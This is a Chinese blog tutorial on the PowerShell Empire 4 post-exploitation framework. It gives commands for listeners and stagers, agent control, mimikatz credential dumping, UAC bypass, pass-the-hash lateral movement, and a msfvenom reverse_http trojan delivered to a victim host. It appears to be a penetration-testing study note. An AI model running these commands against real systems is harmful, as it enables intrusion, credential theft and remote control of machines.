powershell-empire4使用介绍

已于 2022-05-25 22:17:46 修改
阅读量421 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 网络安全
于 2022-05-25 22:11:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/124974569
版权

目录

一、工具使用

1.基本使用

2.agent代理

2.1. agent代理操作命令

2.2. 连入agent后的命令

3.三大类模块

3.1. situational awareness态势感知,也就是信息收集

3.2. Credentials and privilege escalation 权限提升和凭证获取

3.3.  Lateral movement 内网横向移动

4.Empire+matesploit联合使用

前言

        本文通过学习整理了empire4的使用,empire是内网渗透工具,专注于AD域环境,也是后渗透利用工具,文章待继续完善。

一、工具使用

1.基本使用

1)help

        查看帮助,关注listeners,stagers,agetns,modules几个。

2)Listeners and Stagers

        Listeners相当于metasploit的exploit/multi/handler模块。侦听器接受来自各个empire代理的入站连接。

        stagers是empire生成的一小段代码,在受害者上执行,并连接回侦听器,它们在受害者和攻击者之间建立连接,并执行额外的任务,以使staged payload的转移更容易。

3)listeners 查看侦听器

4)info查看信息

5)Options 选项

6)uselistener 创建侦听器

7)http侦听器

       http侦听器是最基本(常用)的listeners,与metasploit中的windows/meterpreter/reverse_http payload一样。通过一系列HTTP GET和POST请求进行通信,以模拟合法的http流量。

        redirector侦听器也值得一提,因为它创建了一个pivot(枢纽),允许通过被破坏的主机与内部网络通信。

        http侦听器选项:

        (1)Name

        (2)Host

        (3)Port

        (4)DefaultDelay视图通过设置从受害主机到侦听器的等待间隔(callback时间)来模拟更多合法的HTTP流量。通过将DefaultDelay设置为随机偏移量,DefaultJitter(抖动)使流量看起来不那么程序化地生成。

        (5)KillDate将在指定日期自动终止所有受害主机上的监听器。这在渗透测试后进行清理时特别有用。

8)Stagers

        windwos平台的利用代码支持标准的DLL(动态链接库)注入、HTML应用、office宏、USB橡皮等。

        stager是一个base64编码的powershell命令字符串。This first-state paylolad将连接到侦听器并获取empire代理代码的其余部分。

【案例】windows批处理

usestager windows/launcher_bat
set Listener http 调用之前创建的侦听器
Execute

2.agent代理

        代理只是stage检索到的最后有效载荷,它允许我们执行命令并与系统交互;

        一旦代理在目标上运行,它将使用HTTP GET和POST请求的数据部分与侦听器建立一个aes加密的通信通道。

2.1. agent代理操作命令

(1)rename 对代理重新命名

(2)kill 移除指定代理,比如kill win2008

(3)ineract win2008 切换到指定agent

2.2. 连入agent后的命令

(1)info 查看系统信息

(2)shell ipconfig 执行/shell ‘del file1’

(3)upload /usr/share/nc.exe 上传文件到目标主机

(4)download file1 默认下载目录:/var/lib/powershell-empire/downloads/代理名

(5)sc 抓取屏幕

(6)mimikatz 获取用户登陆凭证

(7)ps 查看进程列表

(8)psinject 迁移进程,用来伪装进程。(这个整理成文档发布csdn)

(9)bypassuac,绕过用户账户控制

(10)spawn 复制一个代理或者克隆一个代理。

3.三大类模块

        Empire agent的强大功能在于框架提供的各种模块。我们可以通过运行usemodule来列出所有可用的模块。 模块分为多个类别,但也包括基本功能,如键盘记录、屏幕截图和文件下载。

3.1. situational awareness态势感知,也就是信息收集

(1)主机存活探测

powershell/situational_awareness/network/arpscan模块
Set CIDR 192.168.101.0/24
Execute

        或者

set Range 192.168.101.1-192.168.101.10
Execute

(2)端口扫描

Powershell/situational_awareness/network/portscan

(3)收集用户信息

Powershell/situational_awareness/network/powerview/get_user

(4)定位域管理员

Powershell/situational_awareness/network/powerview/user_hunter

        备注:如果NeedsAdmin字段设置为“True”,则脚本需要本地管理员权限。如果OpsecSafe字段设置为True,脚本将避免留下compromise的提示,如临时磁盘文件货新用户账户。这种隐形驱动的方法更有可能避开端点保护机制。

3.2. Credentials and privilege escalation 权限提升和凭证获取

        powerup是一个用于windows本地提权的powershell工具,它使用了几种基于错误配置的技术,如未引用的服务路径、对服务可执行文件的不适当权限、错误的注册表配置、DLL支持等等。

        模块:powershell/privesc/powerup/allchecks

3.3.  Lateral movement 内网横向移动

【案例】

usemodule powershell/lateral_movement/invoke_smbexec
set ComputerName test
set Username administrator
set Hash xxxxxxxxxxxxxxxxxxxxxxxx
set Domain test.com.cn
set Listener http
execute

        前提:如何获得用户的有效凭证

        用户名

        口令NTLM的hash

        比如可以使用mimikatz获取,命令如下:

Usemodule powershell/credentials/mimikatz/command
Execute

4.Empire+matesploit联合使用

【案例】

        比如先拿到了empire会话,过程如下:

(1)利用msfvenom生成一个木马程序

Msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.101.100 LPORT=7777 -f exe -o abc.exe

(2)启动msf

Use exploit/multi/handler
Set payload windows/meterpreter/reverse_http
Set LHOST 192.168.101.100
Set LPORT 7777
Exploit

(3)从empire的agent使用upload上传abc.exe到受害主机

(4)empire的agent执行shell abc.exe

        如果先拿到了matesploit会话,则在matesploit会话上上传empire生成的launcher_bat脚本,在受害机上执行launcher_bat脚本,可以使empire的agent上线。

見贤思齊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
powershell发送http请求
xjmfc的博客
10-12 978
【代码】powershell发送http请求
PowerShell-Empire安装及使用
qq_61074438的博客
05-15 580
Empire简介 Empire是一款针对windows平台的、使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提取到渗透维持的一系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录,Mimkatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似Metasploit,是一个基于PowerShell的远程控制木马。 全部功能可参考官网
Powershell Empire工具介绍使用
菜鸟-宇的个人博客
10-03 248
Empire是一个利用漏洞后的框架,它包括一个纯PowerShell2.0 Windows代理和一个纯Python 2.6/2.7 Linux/OS X代理。它是之前的PowerShell帝国和Python EmPyre项目的合并。该框架提供密码学安全通信和灵活的架构。
Empire(一)基础使用
qq_56426046的博客
09-12 1145
后渗透框架 这个框架渗透内网渗透,主要针对windows内网渗透,这个框架集合了很多powershell内网渗透脚本,它支持域内网渗透,宏钓鱼,内网横行扩展,权限维持,后门生成等。
Powershell Empire的使用
她叫常玉莹
07-04 3995
EmpireEmpire简介使用方法设置监听生成木马DLL木马launcherlauncher_vbs木马launcher_bat 木马Macro木马Ducky连接主机信息收集屏幕截图键盘记录剪贴板记录查找共享收集目标主机信息ARP扫描DNS信息获取查找域管登陆服务器IP本地管理组访问模块提权Bypass UACbypassuac_wscriptPowerUpAllChecks模块GPP横向渗透会话注入Invoke-PsExecInvoke-WMIPowerShell Remoting后门权限持久性劫持sh
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
BlueCommand:使用PowerShell Universal仪表板的PowerShell Empire仪表板和工具前端
03-01
您将在生活中得到更好的服务,但实际上将学习如何使用PowerShell Empire :)特征适用于PowerShell Empire的Web仪表板/控制器! 利用Empire REST API和集成REST集成以检索Empire实例信息(代理,模块下载) 其余集成...
Starkiller:Starkiller是PowerShell Empire的前端
03-20
星际杀手 ...当前已经使用纱1.22.0进行了测试。 yarn install 编译和热重装以进行开发 yarn electron:serve 编译和最小化生产 yarn electron:build # Or to target a specific OS. yarn electron:
Empire-Cli:PowerShell Empire的CLI前端
05-27
这段代码处于beta状态。 在发布完整版本之前,可能会有错误和重大更改。 请提供有关或我们的Discord中的反馈和错误 帝国帝国 新的Empire CLI是使用编写的... 这告诉Empire-Cli使用来自yaml的名为localhost的服务器
Invoke-PrintDemon:这是使用PrintDemon和Faxhell的PowerShell Empire启动器PoC
03-08
这是使用和的启动器PoC。 该模块具有已嵌入的Faxhell DLL,该DLL利用进行特权升级。 该漏洞允许无特权的用户获得系统级特权,并且基于@ ionescu007 PoC。 注意:这是概念证明。 我们在某些计算机上打印到C:\ ...
PowerShell Empire实战入门篇
最新发布
jennycisp的博客
10-30 172
PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。Empire详情介绍参考官方网站:http://powershellempire.com/CSDN大礼包
PowerShell Empire教程使用(Windows、域、后渗透工具)
墨痕诉清风的博客
10-08 310
listeners 监听器接收来自 agent 的入站连接(相当于 msf 的multi/handler)stagger 工作在目标主机上,回连 listeners,进而传输分阶段的 Payload。
powershell-empire4的launcher_bat学习
u013930899的博客
05-21 834
launcher_bat中的内容是base64编码的代码,可以在windows中运行。 套路 选择监听模式设置监听 选择使用stager 执行execute生成木马 投到被害主机执行木马 在powershell-empire上agent交互模式进行操作 渗透过程 启动powershell-empire server powershell-empire server 连接powershell-empire client powershell-e
Empire
m0_65332604的博客
04-06 902
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
Empire基础使用
yyj1781572的博客
11-12 998
Empire基础使用
PowerShell Empire使用笔记
weixin_30737433的博客
01-15 170
##安装过程 git clone https://github.com/EmpireProject/Empire.git cd Empire cd setup sudo ./install.sh ##使用方法 进入监听模式 ##设置监听模式 ##设置参数 执行监听 ##生成后门文件 后门文件模块 直接生成powershell...
Empire(四)会话管理
qq_56426046的博客
09-16 189
spawn设置监听器选择好会话,直接spawn 监听器名就能直接复制一个会话psinject 监听器 进程ID。
Empire框架的基本使用
weixin_45007073的博客
05-23 553
EmpireEmpire的安装生成木马 Empire的安装 首先我们使用git命令将Empire安装包下载到本地 git clone https://github.com/EmpireProject/Empire 然后我们使用help命令查看帮助信息 然后我们设置一个http监听模式,并查看其帮助信息,命令如下 listeners uselistener http info 然后我们开启监听,设置名称和其IP地址(服务器IP) 我们返回后台,可以看到有一个进程正在运行,我们可以使用kill命令将其
网络渗透之帝国
S1942177831的博客
05-19 178
1.下载帝国的三个方法 1.1 window中通过网站下载Releases · EmpireProject/Empire · GitHub 使用empire2.5版本,不是所有电脑都适用(kali) 1.2 kali中直接下载 (root账号下执行命令) git clone https://github.com/BC-SECURITY/Empire #下载帝国 cd Empire 查看python环境 python python2 exit()退出python环境 1....
powershell-7.3.6-win-x64.msi
09-23
powershell-7.3.6-win-x64.msi是一个 Windows 平台上的 Powershell 安装包。Powershell是一种任务自动化和配置管理框架,它提供了一种命令行外壳和脚本语言,用于执行各种管理任务,例如系统配置、文件管理、网络设置等。 powershell-7.3.6-win-x64.msi是适用于64位Windows操作系统的安装包。你可以通过下载和运行该安装包,将Powershell 7.3.6安装到你的机器上。 一旦安装完成,你可以打开Powershell命令行界面,并使用其强大的功能来管理和自动化各种任务。Powershell支持各种命令和模块,你可以使用这些命令和模块来操作文件和文件夹、管理注册表、配置网络设置、执行系统管理任务等。 另外,Powershell还提供了一个脚本语言,你可以编写脚本来执行复杂的操作。你可以使用Powershell脚本来编写自定义的任务和管理脚本,以实现更高效和自动化的工作流程。 总而言之,powershell-7.3.6-win-x64.msi 提供了安装 Powershell 7.3.6 的方式,它是一种功能强大的任务自动化和配置管理框架,可以帮助你更轻松地进行系统管理和任务执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值